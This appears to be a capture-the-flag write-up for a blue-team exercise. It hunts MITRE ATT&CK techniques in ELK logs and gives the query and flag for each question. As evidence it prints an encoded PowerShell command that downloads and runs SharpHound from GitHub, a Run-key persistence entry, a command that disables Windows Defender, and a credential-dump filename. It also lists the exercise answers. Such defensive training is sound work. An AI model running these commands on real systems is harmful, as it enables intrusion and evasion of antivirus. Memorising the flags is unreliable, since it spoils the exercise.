Reconnaissance

Q1

In the ELK dashboard, search for evidence of MITRE ATT&CK ID T1059.001 - specifically for encoded PowerShell commands. What is the flag listed in the command?

 powershell.exe AND EncodedCommand

SUVYIChOZXctT2JqZWN0IE5ldC5XZWJjbGllbnQpLkRvd25sb2FkU3RyaW5nKCdodHRwczovL3Jhdy5naXRodWJ1c2VyY29udGVudC5jb20vQmxvb2RIb3VuZEFEL0Jsb29kSG91bmQvODA0NTAzOTYyYjZkYzU1NGFkN2QzMjRjZmE3ZjJiNGE1NjZhMTRlMi9Jbmdlc3RvcnMvU2hhcnBIb3VuZC5wczEnKTsgZWNobyAiVFRQX0ZMQUd7NWNhZGRlYTVkNTI3YzYxZDM1Nzg1OTRhZGQyYWQ5ZmZ9Ig==

IEX (New-Object Net.Webclient).DownloadString('https://raw.githubusercontent.com/BloodHoundAD/BloodHound/80450396b2b6dc554ad7d324cfa7f2b4a566a14e2/Ingestors/SharpHound.ps1'); echo "TTP_FLAG{5caddea5d527c61d3578594add2ad9ff}"

Answer:

TTP_FLAG{5caddea5d527c61d3578594add2ad9ff}

Q2

In the ELK dashboard, identify evidence related to MITRE ATT&CK technique T1547.001. During your investigation, you will find a hexadecimal string used as a flag. What is the value of that string? Include only the hexadecimal string.

 (event.code:13 OR event.code:12) AND "CurrentVersion\\Run"

HKU\\S-1-5-21-3688751335-3073641799-161370460-500\\Software\\Microsoft\\Windows\\CurrentVersion\\Run\\FL@G: a8f5f167f44f4964e6c998dee827110c

Answer:

a8f5f167f44f4964e6c998dee827110c

Q3

What is the name of the file associated with MITRE ATT&CK ID T1218.005? (filename only)

mshta.exe

Q4

In the 'actions on objectives' stage of their attack, the attacker is attempting to use methods indicated in MITRE ATT&CK ID T1003.002. Find evidence of this in the logs, and enter the flag. (Flag will show in the logs as a filename)

 dump

Answer:

FFFLAAAAG-a3dcb4d229de6fde0db5686dee47145d.dmp

Q5

In preparation for the installation phase of their attack, the attacker makes use of MITRE ATT&CK ID T1562.001 to disable built-in Windows Defender. What is the flag shown for that indicator? (Only include the portion of the flag within the brackets {}, do not include the brackets themselves)

DisableRealtimeMonitoring

powershell.exe -Command Set-MpPreference -DisableRealtimeMonitoring True # FL @ G {525118d8317f54222985e09a922bad86}

Answer:

525118d8317f54222985e09a922bad86